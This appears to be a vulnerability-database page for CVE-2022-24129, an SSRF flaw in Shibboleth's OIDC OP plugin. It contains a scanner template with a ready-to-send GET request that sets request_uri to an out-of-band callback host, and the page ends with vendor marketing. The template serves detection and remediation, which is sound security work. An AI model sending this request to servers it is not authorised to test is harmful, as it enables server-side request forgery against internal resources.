| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| CVE-2022-24129 | 4 Feb 202220:15 | – | attackerkb | |
| CVE-2022-24129 | 4 Feb 202222:36 | – | circl | |
| Shibboleth 代码问题漏洞 | 4 Feb 202200:00 | – | cnnvd | |
| CVE-2022-24129 | 4 Feb 202219:20 | – | cve | |
| CVE-2022-24129 | 4 Feb 202219:20 | – | cvelist | |
| CVE-2022-24129 | 4 Feb 202220:15 | – | nvd | |
| CVE-2022-24129 | 4 Feb 202220:15 | – | osv | |
| Server side request forgery (ssrf) | 4 Feb 202220:15 | – | prion | |
| CVE-2022-24129 | 22 May 202523:57 | – | redhatcve |
id: CVE-2022-24129
info:
name: Shibboleth OIDC OP <3.0.4 - Server-Side Request Forgery
author: 0x_Akoko
severity: high
description: The Shibboleth Identity Provider OIDC OP plugin before 3.0.4 is vulnerable to server-side request forgery (SSRF) due to insufficient restriction of the request_uri parameter, which allows attackers to interact with arbitrary third-party HTTP services.
impact: |
An attacker can exploit this vulnerability to send crafted requests, potentially leading to unauthorized access to internal resources or information disclosure.
remediation: |
Upgrade to Shibboleth OIDC OP version 3.0.4 or later to mitigate the vulnerability.
reference:
- https://github.com/sbaresearch/advisories/tree/public/2022/SBA-ADV-20220127-01_Shibboleth_IdP_OIDC_OP_Plugin_SSRF
- https://shibboleth.atlassian.net/wiki/spaces/IDPPLUGINS/pages/1376878976/OIDC+OP
- http://shibboleth.net/community/advisories/
- https://nvd.nist.gov/vuln/detail/CVE-2022-24129
- http://shibboleth.net/community/advisories/secadv_20220131.txt
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
cvss-score: 8.2
cve-id: CVE-2022-24129
cwe-id: CWE-918
epss-score: 0.06139
epss-percentile: 0.92564
cpe: cpe:2.3:a:shibboleth:oidc_op:*:*:*:*:*:identity_provider:*:*
metadata:
max-request: 1
vendor: shibboleth
product: oidc_op
framework: identity_provider
tags: cve,cve2022,ssrf,oidc,shibboleth,identity_provider,vuln
http:
- method: GET
path:
- '{{BaseURL}}/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: word
part: interactsh_request
words:
- "ShibbolethIdp"
# digest: 4a0a00473045022100c402db0231ed1a1da41eb49923463cb440ce0436fbad6ecf3d6de1da45d9e53602201091273daac6faabbab179875031d5bc63f7739c79d5bef368b79b73f51cde68:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation